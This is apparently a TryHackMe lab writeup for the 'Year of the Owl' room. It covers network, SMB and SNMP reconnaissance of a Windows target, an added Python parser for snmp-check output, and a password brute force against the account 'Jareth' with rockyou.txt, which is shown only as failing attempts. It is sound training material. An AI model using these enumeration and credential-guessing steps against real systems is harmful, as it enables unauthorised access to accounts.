Introduction
This article is a TryHackMe writeup.
The room is Year of the Owl, and its difficulty is Hard.
In this room you can learn attack techniques against Active Directory and the SNMP protocol
as they appear in Year of the Owl.
Recon
Port Scan
Scanned at 2026-05-05 21:45:53 JST for 59s
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 126 Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.10)
|_http-title: Year of the Owl
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.10
139/tcp open netbios-ssn syn-ack ttl 126 Microsoft Windows netbios-ssn
443/tcp open ssl/http syn-ack ttl 126 Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.10)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.10
|_http-title: Year of the Owl
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4 4cc9 9e84 b26f 9e63 9f9e d229 dee0
| SHA-1: b023 8c54 7a90 5bfa 119c 4e8b acca eacf 3649 1ff6
| SHA-256: 0169 7338 0c0f 1df0 0bd9 593e d8d5 efa3 706c d6df 7993 f614 1272 b805 22ac dd23
| tls-alpn:
|_ http/1.1
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
445/tcp open microsoft-ds? syn-ack ttl 126
3306/tcp open mysql syn-ack ttl 126 MariaDB 10.3.24 or later (unauthorized)
3389/tcp open ms-wbt-server syn-ack ttl 126 Microsoft Terminal Services
|_ssl-date: 2026-05-05T12:46:50+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=year-of-the-owl
| Issuer: commonName=year-of-the-owl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-05-04T12:44:33
| Not valid after: 2026-11-03T12:44:33
| MD5: 92cd f85e bbee 25b0 4b31 f0e7 c0eb e647
| SHA-1: fd32 1ddb 2e7e d433 1439 3fb4 0920 f25e 1f56 0282
| SHA-256: 78b7 6df1 a429 4efb 6ef7 8355 28d4 9070 401d d6b7 6621 52f0 26e9 06d0 e298 823f
| rdp-ntlm-info:
| Target_Name: YEAR-OF-THE-OWL
| NetBIOS_Domain_Name: YEAR-OF-THE-OWL
| NetBIOS_Computer_Name: YEAR-OF-THE-OWL
| DNS_Domain_Name: year-of-the-owl
| DNS_Computer_Name: year-of-the-owl
| Product_Version: 10.0.17763
|_ System_Time: 2026-05-05T12:46:10+00:00
5985/tcp open http syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-time:
| date: 2026-05-05T12:46:13
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 14242/tcp): CLEAN (Timeout)
| Check 2 (port 33917/tcp): CLEAN (Timeout)
| Check 3 (port 22914/udp): CLEAN (Timeout)
| Check 4 (port 38214/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
enum4linux
┌──(rikuxx㉿kali)-[~]
└─$ enum4linux [target_ip]
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue May 5 21:59:04 2026
=========================================( Target Information )=========================================
Target ........... [target_ip]
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on [target_ip] )===========================
[E] Can't find workgroup/domain
===============================( Nbtstat Information for [target_ip] )===============================
Looking up status of [target_ip]
No reply from [target_ip]
===================================( Session Check on [target_ip] )===================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
Taking stock of the situation, the attack surface looks fairly broad.
It seems the investigation needs to be split into the Active Directory side, the web side, and the network side.
Scanning
Web Scanning
Gobuster
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://[target_ip]/
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://[target_ip]/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
.htaccess (Status: 403) [Size: 303]
.hta (Status: 403) [Size: 303]
.htpasswd (Status: 403) [Size: 303]
aux (Status: 403) [Size: 303]
cgi-bin/ (Status: 403) [Size: 303]
com1 (Status: 403) [Size: 303]
com3 (Status: 403) [Size: 303]
com2 (Status: 403) [Size: 303]
con (Status: 403) [Size: 303]
examples (Status: 503) [Size: 403]
index.php (Status: 200) [Size: 252]
licenses (Status: 403) [Size: 422]
lpt2 (Status: 403) [Size: 303]
lpt1 (Status: 403) [Size: 303]
nul (Status: 403) [Size: 303]
phpmyadmin (Status: 403) [Size: 303]
prn (Status: 403) [Size: 303]
server-info (Status: 403) [Size: 422]
server-status (Status: 403) [Size: 422]
webalizer (Status: 403) [Size: 303]
Progress: 4613 / 4613 (100.00%)
===============================================================
Finished
===============================================================
Query parameter enumeration
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ ffuf -u http://[target_ip]/index.php?FUZZ=test -w /usr/share/wordlists/dirb/common.txt -fs 252
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://[target_ip]/index.php?FUZZ=test
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 252
________________________________________________
:: Progress: [4614/4614] :: Job [1/1] :: 290 req/sec :: Duration: [0:00:21] :: Errors: 0 ::
Nothing much on the web side, it seems.
Active Directory Scanning
Samba
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ nxc smb [target_ip] -u "" -p "" --shares
SMB [target_ip] 445 YEAR-OF-THE-OWL [*] Windows 10 / Server 2019 Build 17763 (name:YEAR-OF-THE-OWL) (domain:year-of-the-owl) (signing:False) (SMBv1:None)
SMB [target_ip] 445 YEAR-OF-THE-OWL [-] year-of-the-owl\: STATUS_ACCESS_DENIED
SMB [target_ip] 445 YEAR-OF-THE-OWL [-] Error enumerating shares: Error occurs while reading from remote(104)
Nothing here either.
This is seriously hard, so after wrestling with Gemini, it seemed best to trust the possibility that the SNMP protocol could be probed.
Network Scanning
SNMP
For the scan, we use the SNMP scanning tool below.
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ onesixtyone -c /usr/share/doc/onesixtyone/dict.txt [target_ip]
Scanning 1 hosts, 50 communities
[target_ip] [openview] Hardware: Intel64 Family 6 Model 79 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 17763 Multiprocessor Free)
It turns out there is a community string named openview. So we use the SNMP enumeration tool below and scan the target host with that disclosed SNMP community string.
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ snmp-check [target_ip] -c openview
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 10.49.152.221:161 using SNMPv1 and community 'openview'
[*] System information:
Host IP address : 10.49.152.221
Hostname : year-of-the-owl
Description : Hardware: Intel64 Family 6 Model 79 Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 17763 Multiprocessor Free)
Contact : -
Location : -
Uptime snmp : 00:43:49.20
Uptime system : 00:42:53.12
System date : 2026-5-5 14:27:25.5
Domain : WORKGROUP
[*] User accounts:
Guest
Jareth
Administrator
DefaultAccount
WDAGUtilityAccount
[*] Network information:
IP forwarding enabled : no
Default TTL : 128
TCP segments received : 146495
TCP segments sent : 16268
TCP segments retrans : 686
Input datagrams : 146616
Delivered datagrams : 146979
Output datagrams : 17160
[*] Network interfaces:
Interface : [ up ] Software Loopback Interface 1
Id : 1
Mac Address : :::::
Type : softwareLoopback
Speed : 1073 Mbps
MTU : 1500
In octets : 0
Out octets : 0
Interface : [ down ] Microsoft 6to4 Adapter
Id : 2
Mac Address : :::::
Type : unknown
Speed : 0 Mbps
MTU : 0
In octets : 0
Out octets : 0
Interface : [ down ] Microsoft IP-HTTPS Platform Adapter
Id : 3
Mac Address : :::::
Type : unknown
Speed : 0 Mbps
MTU : 0
In octets : 0
Out octets : 0
Interface : [ down ] Microsoft Kernel Debug Network Adapter
Id : 4
Mac Address : :::::
Type : ethernet-csmacd
Speed : 0 Mbps
MTU : 0
In octets : 0
Out octets : 0
Interface : [ down ] Intel(R) 82574L Gigabit Network Connection
Id : 5
Mac Address : 00:0c:29:02:45:89
Type : ethernet-csmacd
Speed : 0 Mbps
MTU : 0
In octets : 0
Out octets : 0
Interface : [ down ] Microsoft Teredo Tunneling Adapter
Id : 6
Mac Address : :::::
Type : unknown
Speed : 0 Mbps
MTU : 0
In octets : 0
Out octets : 0
Interface : [ up ] AWS PV Network Device #0
Id : 7
Mac Address : 0a:ec:5a:83:17:fb
Type : ethernet-csmacd
Speed : 1000 Mbps
MTU : 9001
In octets : 12209117
Out octets : 7961383
Interface : [ up ] AWS PV Network Device #0-WFP Native MAC Layer LightWeight Filter-0000
Id : 8
Mac Address : 0a:ec:5a:83:17:fb
Type : ethernet-csmacd
Speed : 1000 Mbps
MTU : 9001
In octets : 12209117
Out octets : 7961383
Interface : [ up ] AWS PV Network Device #0-QoS Packet Scheduler-0000
Id : 9
Mac Address : 0a:ec:5a:83:17:fb
Type : ethernet-csmacd
Speed : 1000 Mbps
MTU : 9001
In octets : 12209117
Out octets : 7961383
Interface : [ up ] AWS PV Network Device #0-WFP 802.3 MAC Layer LightWeight Filter-0000
Id : 10
Mac Address : 0a:ec:5a:83:17:fb
Type : ethernet-csmacd
Speed : 1000 Mbps
MTU : 9001
In octets : 12209117
Out octets : 7961383
[*] Network IP:
Id IP Address Netmask Broadcast
7 10.49.152.221 255.255.192.0 1
1 127.0.0.1 255.0.0.0 1
[*] Routing information:
Destination Next hop Mask Metric
0.0.0.0 10.49.128.1 0.0.0.0 25
10.49.128.0 10.49.152.221 255.255.192.0 281
10.49.152.221 10.49.152.221 255.255.255.255 281
10.49.191.255 10.49.152.221 255.255.255.255 281
127.0.0.0 127.0.0.1 255.0.0.0 331
127.0.0.1 127.0.0.1 255.255.255.255 331
127.255.255.255 127.0.0.1 255.255.255.255 331
169.254.169.123 10.10.0.1 255.255.255.255 50
169.254.169.249 10.10.0.1 255.255.255.255 50
169.254.169.250 10.10.0.1 255.255.255.255 50
169.254.169.251 10.10.0.1 255.255.255.255 50
169.254.169.253 10.10.0.1 255.255.255.255 50
169.254.169.254 10.10.0.1 255.255.255.255 50
224.0.0.0 127.0.0.1 240.0.0.0 331
255.255.255.255 127.0.0.1 255.255.255.255 331
[*] TCP connections and listening ports:
Local address Local port Remote address Remote port State
0.0.0.0 80 0.0.0.0 0 listen
0.0.0.0 135 0.0.0.0 0 listen
0.0.0.0 443 0.0.0.0 0 listen
0.0.0.0 445 0.0.0.0 0 listen
0.0.0.0 3306 0.0.0.0 0 listen
0.0.0.0 3389 0.0.0.0 0 listen
0.0.0.0 5985 0.0.0.0 0 listen
0.0.0.0 47001 0.0.0.0 0 listen
0.0.0.0 49664 0.0.0.0 0 listen
0.0.0.0 49665 0.0.0.0 0 listen
0.0.0.0 49667 0.0.0.0 0 listen
0.0.0.0 49668 0.0.0.0 0 listen
0.0.0.0 49669 0.0.0.0 0 listen
0.0.0.0 49671 0.0.0.0 0 listen
10.49.152.221 139 0.0.0.0 0 listen
10.49.152.221 50004 169.254.169.254 80 synSent
10.49.152.221 50005 169.254.169.254 80 synSent
10.49.152.221 50006 20.165.94.63 443 synSent
10.49.152.221 50007 169.254.169.254 80 synSent
[*] Listening UDP ports:
Local address Local port
0.0.0.0 123
0.0.0.0 161
0.0.0.0 3389
0.0.0.0 5353
0.0.0.0 5355
10.49.152.221 137
10.49.152.221 138
127.0.0.1 61849
[*] Network services:
Index Name
0 Power
1 mysql
2 Server
3 Themes
4 SysMain
5 Apache2.4
6 IP Helper
7 DNS Client
8 DHCP Client
9 Time Broker
10 Workstation
11 SNMP Service
12 User Manager
13 Windows Time
14 CoreMessaging
15 Plug and Play
16 Print Spooler
17 Task Scheduler
18 Windows Update
19 Amazon SSM Agent
20 CNG Key Isolation
21 COM+ Event System
22 Windows Event Log
23 IPsec Policy Agent
24 Group Policy Client
25 RPC Endpoint Mapper
26 Web Account Manager
27 AWS Lite Guest Agent
28 Data Sharing Service
29 Device Setup Manager
30 Network List Service
31 System Events Broker
32 User Profile Service
33 Base Filtering Engine
34 Local Session Manager
35 TCP/IP NetBIOS Helper
36 Cryptographic Services
37 Diagnostic System Host
38 Application Information
39 Certificate Propagation
40 Remote Desktop Services
41 Shell Hardware Detection
42 Diagnostic Policy Service
43 Network Connection Broker
44 Security Accounts Manager
45 Windows Defender Firewall
46 Windows Modules Installer
47 Network Location Awareness
48 Windows Connection Manager
49 Windows Font Cache Service
50 Remote Procedure Call (RPC)
51 Update Orchestrator Service
52 User Access Logging Service
53 DCOM Server Process Launcher
54 Remote Desktop Configuration
55 Windows Update Medic Service
56 Network Store Interface Service
57 Distributed Link Tracking Client
58 System Event Notification Service
59 Connected Devices Platform Service
60 Windows Defender Antivirus Service
61 Windows Management Instrumentation
62 Distributed Transaction Coordinator
63 Background Tasks Infrastructure Service
64 Program Compatibility Assistant Service
65 Connected User Experiences and Telemetry
66 WinHTTP Web Proxy Auto-Discovery Service
67 Windows Push Notifications System Service
68 Windows Remote Management (WS-Management)
69 Remote Desktop Services UserMode Port Redirector
70 Windows Defender Antivirus Network Inspection Service
[*] Processes:
Id Status Name Path Parameters
1 running System Idle Process
4 running System
68 running Registry
396 running taskhostw.exe /RuntimeWide
408 running smss.exe
504 running dwm.exe
564 running csrss.exe
632 running svchost.exe C:\Windows\system32\ -k netsvcs -p
640 running csrss.exe
656 running wininit.exe
700 running winlogon.exe
756 running svchost.exe C:\Windows\System32\ -k LocalSystemNetworkRestricted -p
764 running services.exe
780 running lsass.exe C:\Windows\system32\
840 running svchost.exe C:\Windows\System32\ -k termsvcs
880 running svchost.exe C:\Windows\system32\ -k DcomLaunch -p
904 running fontdrvhost.exe
912 running fontdrvhost.exe
976 running svchost.exe C:\Windows\system32\ -k RPCSS -p
988 running snmp.exe C:\Windows\System32\
1028 running svchost.exe C:\Windows\System32\ -k LocalServiceNetworkRestricted -p
1216 running svchost.exe C:\Windows\system32\ -k LocalService -p
1244 running MsMpEng.exe
1296 running svchost.exe C:\Windows\System32\ -k NetworkService -p
1320 running svchost.exe C:\Windows\system32\ -k LocalServiceNetworkRestricted -p
1416 running LiteAgent.exe C:\Program Files\Amazon\XenTools\
1440 running svchost.exe C:\Windows\system32\ -k LocalServiceNoNetwork -p
1472 running svchost.exe C:\Windows\system32\ -k LocalServiceNoNetworkFirewall -p
1544 running amazon-ssm-agent.exe C:\Program Files\Amazon\SSM\
1616 running httpd.exe C:\xampp\apache\bin\ -k runservice
1692 running svchost.exe C:\Windows\system32\ -k netsvcs
1916 running spoolsv.exe C:\Windows\System32\
2032 running svchost.exe C:\Windows\system32\ -k LocalService
2040 running svchost.exe C:\Windows\System32\ -k utcsvc -p
2076 running mysqld.exe C:\xampp\mysql\bin\ --defaults-file=c:\xampp\mysql\bin\my.ini mysql
2096 running svchost.exe C:\Windows\System32\ -k smbsvcs
2116 running WmiPrvSE.exe C:\Windows\system32\wbem\
2140 running msdtc.exe C:\Windows\System32\
2228 running httpd.exe C:\xampp\apache\bin\ -d C:/xampp/apache
2328 running svchost.exe C:\Windows\system32\ -k NetworkServiceNetworkRestricted -p
2740 running conhost.exe \??\C:\Windows\system32\ 0x4
2916 running LogonUI.exe /flags:0x2 /state0:0xa3a7e055 /state1:0x41c64e6d
2936 running TiWorker.exe C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.17763.1450_none_56e6965b991df4af\ -Embedding
3672 running CompatTelRunner.exe C:\Windows\system32\ -maintenance
3676 running TrustedInstaller.exe C:\Windows\servicing\
3736 running WmiPrvSE.exe C:\Windows\system32\wbem\
3816 running NisSrv.exe
3900 running svchost.exe
3980 running CompatTelRunner.exe C:\Windows\system32\ -m:appraiser.dll -f:DoScheduledTelemetryRun -cv:/dz5id+4cE6lsma3.2
[*] Storage information:
Description : ["C:\\ Label: Serial Number 7c0c3814"]
Device id : [#<SNMP::Integer:0x00007fc40943ed40 @value=1>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x00007fc40943d1c0 @value=4096>]
Memory size : 19.46 GB
Memory used : 14.15 GB
Description : ["Virtual Memory"]
Device id : [#<SNMP::Integer:0x00007fc409438530 @value=2>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x00007fc409436b18 @value=65536>]
Memory size : 3.12 GB
Memory used : 1.44 GB
Description : ["Physical Memory"]
Device id : [#<SNMP::Integer:0x00007fc409432130 @value=3>]
Filesystem type : ["unknown"]
Device unit : [#<SNMP::Integer:0x00007fc409430510 @value=65536>]
Memory size : 2.00 GB
Memory used : 1.33 GB
[*] File system information:
Index : 1
Mount point :
Remote mount point : -
Access : 1
Bootable : 0
[*] Device information:
Id Type Status Descr
1 unknown running Microsoft XPS Document Writer v4
2 unknown running Microsoft Print To PDF
3 unknown running Unknown Processor Type
4 unknown unknown Software Loopback Interface 1
5 unknown unknown Microsoft 6to4 Adapter
6 unknown unknown Microsoft IP-HTTPS Platform Adapter
7 unknown unknown Microsoft Kernel Debug Network Adapter
8 unknown unknown Intel(R) 82574L Gigabit Network Connection
9 unknown unknown Microsoft Teredo Tunneling Adapter
10 unknown unknown AWS PV Network Device #0
11 unknown unknown AWS PV Network Device #0-WFP Native MAC Layer LightWeight Filter
12 unknown unknown AWS PV Network Device #0-QoS Packet Scheduler-0000
13 unknown unknown AWS PV Network Device #0-WFP 802.3 MAC Layer LightWeight Filter-
14 unknown running Fixed Disk
15 unknown running Fixed Disk
16 unknown running IBM enhanced (101- or 102-key) keyboard, Subtype=(0)
17 unknown unknown COM1:
[*] Software components:
Index Name
1 XAMPP
2 Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.11.25325
3 Microsoft Visual C++ 2017 x64 Additional Runtime - 14.11.25325
4 Amazon SSM Agent
5 Amazon SSM Agent
6 Microsoft Visual C++ 2017 Redistributable (x64) - 14.11.25325
(Replacing every address with [target_ip] is tedious, so it is enough to see that the scan worked.)
From the output above, we can build the following user list (users.txt).
users.txt
Administrator
Jareth
Guest
DefaultAccount
WDAGUtilityAccount
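The user list above was assembled by hand. As an added example (not the author's script), here is a parser for the snmp-check sections that also pulls out the TCP listening ports and compares them with what nmap reported from the outside, since the SNMP table lists port 135 as listening while the port scan showed it filtered. The excerpt it parses is a constructed copy of a few lines from the output above.

```python
"""Turn snmp-check output into a user list and a listening-port check.

Added example, not the writeup author's script. SAMPLE is a constructed
excerpt of the snmp-check run above; NMAP_OPEN is the open-port set nmap
reported from the outside.
"""
from __future__ import annotations
import re
from pathlib import Path

SAMPLE = """\
[+] Try to connect to 10.49.152.221:161 using SNMPv1 and community 'openview'

[*] System information:

  Hostname                      : year-of-the-owl
  Domain                        : WORKGROUP

[*] User accounts:

  Guest
  Jareth
  Administrator
  DefaultAccount
  WDAGUtilityAccount

[*] TCP connections and listening ports:

  Local address   Local port   Remote address    Remote port   State
  0.0.0.0         135          0.0.0.0           0             listen
  0.0.0.0         445          0.0.0.0           0             listen
  0.0.0.0         5985         0.0.0.0           0             listen
  10.49.152.221   50004        169.254.169.254   80            synSent

[*] Listening UDP ports:

  Local address   Local port
  0.0.0.0         161
"""
NMAP_OPEN = {80, 139, 443, 445, 3306, 3389, 5985, 47001}   # from the port scan above

SECTION_RE = re.compile(r"^\[\*\]\s+(.+?):\s*$")


def split_sections(text: str) -> dict[str, list[str]]:
    """Group the non-empty lines under the '[*] Name:' header that precedes them."""
    sections: dict[str, list[str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1)
            sections[current] = []
        elif current is not None:
            sections[current].append(line)
    return sections


def user_accounts(sections: dict[str, list[str]]) -> list[str]:
    """One account name per line; anything containing whitespace is not a username."""
    return [u for u in sections.get("User accounts", []) if " " not in u]


def listening_tcp_ports(sections: dict[str, list[str]]) -> set[int]:
    """Local ports whose State column is 'listen' (the header row has no digits there)."""
    ports = set()
    for line in sections.get("TCP connections and listening ports", []):
        cols = line.split()
        if len(cols) == 5 and cols[4] == "listen" and cols[1].isdigit():
            ports.add(int(cols[1]))
    return ports


def hidden_from_scanner(sections: dict[str, list[str]], nmap_open: set[int]) -> set[int]:
    """Ports the host says it listens on but the external scan did not show as open."""
    return listening_tcp_ports(sections) - nmap_open


def write_userlist(users: list[str], path: str = "users.txt") -> int:
    """Write one name per line (the file fed to nxc above); returns the count written."""
    Path(path).write_text("\n".join(users) + "\n")
    return len(users)


if __name__ == "__main__":
    secs = split_sections(SAMPLE)
    print("users:", user_accounts(secs))
    print("listening but not seen by nmap:", hidden_from_scanner(secs, NMAP_OPEN))
    print("wrote", write_userlist(user_accounts(secs)), "names to users.txt")
```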
Using users.txt, we investigate Samba.
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ nxc smb [target_ip] -u ./users.txt -p "" --shares
SMB [target_ip] 445 YEAR-OF-THE-OWL [*] Windows 10 / Server 2019 Build 17763 (name:YEAR-OF-THE-OWL) (domain:year-of-the-owl) (signing:False) (SMBv1:None)
SMB [target_ip] 445 YEAR-OF-THE-OWL [-] year-of-the-owl\Guest: STATUS_ACCOUNT_DISABLED
SMB [target_ip] 445 YEAR-OF-THE-OWL [-] year-of-the-owl\Jareth: STATUS_LOGON_FAILURE
SMB [target_ip] 445 YEAR-OF-THE-OWL [-] year-of-the-owl\Administrator: STATUS_LOGON_FAILURE
SMB [target_ip] 445 YEAR-OF-THE-OWL [-] year-of-the-owl\DefaultAccount: STATUS_ACCOUNT_DISABLED
SMB [target_ip] 445 YEAR-OF-THE-OWL [-] year-of-the-owl\WDAGUtilityAccount: STATUS_LOGON_FAILURE
Nothing useful comes out of it.
We also try mysql.
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ mysql -h [target_ip] -u Jareth
ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1130 - Host 'ip-192-168-160-200.ap-south-1.compute.internal' is not allowed to connect to this MariaDB server
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ mysql -h [target_ip] -u Guest
ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1130 - Host 'ip-192-168-160-200.ap-south-1.compute.internal' is not allowed to connect to this MariaDB server
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ mysql -h [target_ip] -u DefaultAccount
ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1130 - Host 'ip-192-168-160-200.ap-south-1.compute.internal' is not allowed to connect to this MariaDB server
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ mysql -h [target_ip] -u WDAGUtilityAccount
ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1130 - Host 'ip-192-168-160-200.ap-south-1.compute.internal' is not allowed to connect to this MariaDB server
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ mysql -h [target_ip] -u Administrator
ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1130 - Host 'ip-192-168-160-200.ap-south-1.compute.internal' is not allowed to connect to this MariaDB server
No change there.
We also run Gobuster again with a larger wordlist.
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://[target_ip]
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://[target_ip]
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ (Status: 403) [Size: 303]
examples (Status: 503) [Size: 403]
licenses (Status: 403) [Size: 422]
*checkout* (Status: 403) [Size: 303]
phpmyadmin (Status: 403) [Size: 303]
webalizer (Status: 403) [Size: 303]
*docroot* (Status: 403) [Size: 303]
* (Status: 403) [Size: 303]
con (Status: 403) [Size: 303]
**http%3a (Status: 403) [Size: 303]
*http%3A (Status: 403) [Size: 303]
aux (Status: 403) [Size: 303]
**http%3A (Status: 403) [Size: 303]
**http%3A%2F%2Fwww (Status: 403) [Size: 303]
Progress: 86863 / 220558 (39.38%)^Z
zsh: suspended gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Nothing.
We also rescan all ports, but nothing new turns up there either.
┌──(rikuxx㉿kali)-[~]
└─$ sudo nmap -sC -sV -T4 -p- [target_ip]
[sudo] rikuxx のパスワード:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-05 23:04 +0900
Nmap scan report for [target_ip]
Host is up (0.15s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.10)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.10
|_http-title: Year of the Owl
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.10)
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.10
|_http-title: Year of the Owl
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
445/tcp open microsoft-ds?
3306/tcp open mysql MariaDB 10.3.24 or later (unauthorized)
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: YEAR-OF-THE-OWL
| NetBIOS_Domain_Name: YEAR-OF-THE-OWL
| NetBIOS_Computer_Name: YEAR-OF-THE-OWL
| DNS_Domain_Name: year-of-the-owl
| DNS_Computer_Name: year-of-the-owl
| Product_Version: 10.0.17763
|_ System_Time: 2026-05-05T14:07:14+00:00
| ssl-cert: Subject: commonName=year-of-the-owl
| Not valid before: 2026-05-04T13:49:41
|_Not valid after: 2026-11-03T13:49:41
|_ssl-date: 2026-05-05T14:07:52+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-05-05T14:07:17
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 226.52 seconds
No change.
Exploitation
Having no other option, I consulted other writeups.
It seems the following brute-force command gets through.
nxc smb <MACHINE-IP> -u Jareth -p /usr/share/wordlists/rockyou.txt
I actually tried it.
┌──(rikuxx㉿kali)-[~/tryhackme/Year_of_the_Owl]
└─$ nxc smb [target_ip] -u Jareth -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding
SMB [target_ip] 445 YEAR-OF-THE-OWL [*] Windows 10 / Server 2019 Build 17763 (name:YEAR-OF-THE-OWL) (domain:year-of-the-owl) (signing:False) (SMBv1:None)
SMB [target_ip] 445 YEAR-OF-THE-OWL [-] year-of-the-owl\Jareth:123456 STATUS_LOGON_FAILURE
......
......
......
SMB [target_ip] 445 YEAR-OF-THE-OWL [-] year-of-the-owl\Jareth:natalie STATUS_LOGON_FAILURE
SMB [target_ip] 445 YEAR-OF-THE-OWL [-] year-of-the-owl\Jareth:cuteako STATUS_LOGON_FAILURE
